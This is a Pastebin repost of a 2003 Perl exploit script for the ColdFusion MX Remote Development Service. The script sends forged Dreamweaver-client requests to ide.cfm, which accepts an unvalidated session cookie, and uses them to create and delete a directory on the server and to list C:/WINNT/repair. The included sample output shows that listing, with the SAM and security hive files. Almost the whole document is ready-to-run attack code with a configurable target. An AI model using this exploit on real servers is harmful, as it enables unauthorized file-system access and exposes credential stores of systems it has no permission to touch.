Advertisement
FlyFar

ColdFusion MX - Remote Development Service

Jan 27th, 2024
1,149
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 6.28 KB | Cybersecurity | 0 0
  1. #!/usr/bin/perl
  2. # RDS_c_Dump.pl
  3. # By angry packet
  4.  
  5. ##
  6. #     THIS IS AN UNPATCHED VULNERABILITY - THIS IS AN UNPATCHED VULNERABILITY
  7. #
  8. # ColdFusion 6 MX Server does several things in order to get remote dir structure so we will need
  9. # to recreate these functions. This is a "almost" complete emulation of a dreamweaver client connection,
  10. # in like one full HTTP1/1 session witin netcat.
  11. #
  12. # I would like to point out that the ASPSESSID never validates so you can change this on the fly.
  13. #
  14. # Due to certian current situations I am not allowed to release full exploit code with
  15. # ( READ, RETRIEVE, WRITE ) functions.
  16. #
  17. # Sample output:
  18. # --------------------------------
  19. # Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
  20. #
  21. # POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
  22. #
  23. # Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
  24. # Content-Length: 37
  25. # Please wait.. ..
  26. # HTTP/1.1 100 Continue
  27. # Server: Microsoft-IIS/5.0
  28. # Date: Tue, 01 Jul 2003 10:30:43 GMT
  29. #
  30. # HTTP/1.1 200 OK
  31. # Server: Microsoft-IIS/5.0
  32. # Date: Tue, 01 Jul 2003 10:30:43 GMT
  33. # Connection: close
  34. # Content-Type: text/html
  35. #
  36. # 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,
  37. # 02:F:10:ntuser.dat1:66:1187843:0,02:F:3:sam1:65:204803:0,
  38. # 02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,
  39. # 02:F:9:setup.log1:66:1551943:0,02:F:8:software1:67:65331203:0,02:F:6:system1:66:9748483:0,0
  40. # Vic7im1@cipher:~/Scripts/RDS_Sploit$
  41. # ----------------------------------
  42.  
  43.  
  44. use strict;
  45. use IO::Socket;
  46.  
  47. use vars qw($response @clength @rarray);
  48.  
  49. ## Dreamweaver string requests to ide.cfm
  50. ## --------------------------------------
  51. #1:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:         Content-Length: 46
  52. #2:  3:STR:7:C:/_mm/STR:1:*STR:0:                   Content-Length: 28
  53. #3:  3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:        Content-Length: 47
  54. #4:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:         Content-Length: 46
  55. #5:  3:STR:10:C:/_notes/STR:1:*STR:0:                   Content-Length: 32
  56. #6:  5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0      Content-Length: 50
  57. #7:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:         Content-Length: 46
  58. #8:  5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:    Content-Length: 51
  59. #9:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
  60. #10: 3:STR:3:C:/STR:1:*STR:0:                   Content-Length: 24
  61. #11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
  62. #12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:  Content-Length: 53
  63. #13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
  64. #14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:  Content-Length: 53
  65. #15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
  66. #16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:    Content-Length: 51
  67. #17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
  68. #18: 3:STR:8:C:/WINNTSTR:1:*STR*STR:0:              Content-Length: 29
  69. #19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
  70. #20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:          Content-Length: 37
  71.  
  72.  
  73. # Static Content-Lenght: $string_val if you plan on leaving C:\WINNT\repair you will need to know
  74. # the $string_val.
  75. @clength = ( "Content-Length: 46",
  76.          "Content-Length: 28",
  77.          "Content-Length: 47",
  78.          "Content-Length: 46",
  79.              #"Content-Length: 32",
  80.          #"Content-Length: 50",
  81.          "Content-Length: 46",
  82.          "Content-Length: 51",
  83.          "Content-Length: 46",
  84.          "Content-Length: 24",
  85.          "Content-Length: 46",
  86.          "Content-Length: 53",
  87.          "Content-Length: 46",
  88.          "Content-Length: 53",
  89.          "Content-Length: 46",
  90.          "Content-Length: 51",
  91.          "Content-Length: 46",
  92.          "Content-Length: 29",
  93.          "Content-Length: 46",
  94.          "Content-Length: 37"
  95.        );
  96.  
  97.  
  98. @rarray = ( "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  99.         "3:STR:7:C:/_mm/STR:1:*STR:0:",
  100.         "3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:",
  101.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  102.         #"3:STR:10:C:/_notes/STR:1:*STR:0:",
  103.         #"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0",
  104.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  105.         "5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:",
  106.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  107.         "3:STR:3:C:/STR:1:*STR:0:",
  108.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  109.         "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
  110.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  111.         "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
  112.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  113.         "5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:",
  114.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  115.         "3:STR:8:C:/WINNTSTR:1:*STR*STR:0:",
  116.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  117.         "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
  118.         );
  119.  
  120.  
  121.  
  122. system("clear");
  123. # change target addy below.
  124. my $TARGET = "192.168.0.100";
  125. my $PORT = "80";
  126. my $STRING = "C:/WINNT/repair";
  127. my $POST = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n";
  128.  
  129.  
  130. print "Generating Socket with Array Directory Values.\n";
  131. my ( $i, $c);
  132. for ( $i = 0; $i < @rarray; $i++  ) {
  133.     for ( $c = 0; $c < @clength; $c++ ) {  
  134.             if( $i == $c ) {
  135.             &gen_sock($TARGET, $PORT, $rarray[$i], $clength[$c]);
  136.         }
  137.     }
  138. }
  139.  
  140.  
  141. sub gen_sock() {
  142.     my $sock = new IO::Socket::INET(PeerAddr => $TARGET,
  143.                     PeerPort => $PORT,
  144.                     Proto    => 'tcp',
  145.                     );
  146.     die "Socket Could not be established ! $!" unless $sock;
  147.     print "Target: $TARGET:$PORT\n";
  148.     print "$POST\n";
  149.     print "Request String Value: $rarray[$i]\n";
  150.     print "$clength[$c]\n";
  151.     print "Please wait.. ..\n";
  152.     print $sock "$POST";
  153.     print $sock "Content-Type: application/x-ColdFusionIDE\r\n";
  154.     print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n";
  155.     print $sock "Host: $TARGET\r\n";
  156.     print $sock "$clength[$c]\r\n";
  157.     print $sock "Connection: Keep-Alive\r\n";
  158.     print $sock "Cache-Control: no-cache\r\n";
  159.     print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n";
  160.     print $sock "\r\n";
  161.     print $sock "$rarray[$i]";
  162.    
  163.     # lets return and print data to term
  164.     while($response = <$sock>) {
  165.         chomp($response);
  166.         print "$response\n";
  167.     }
  168.     close($sock);
  169. }
  170.  
  171. # milw0rm.com [2003-07-07]
  172.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement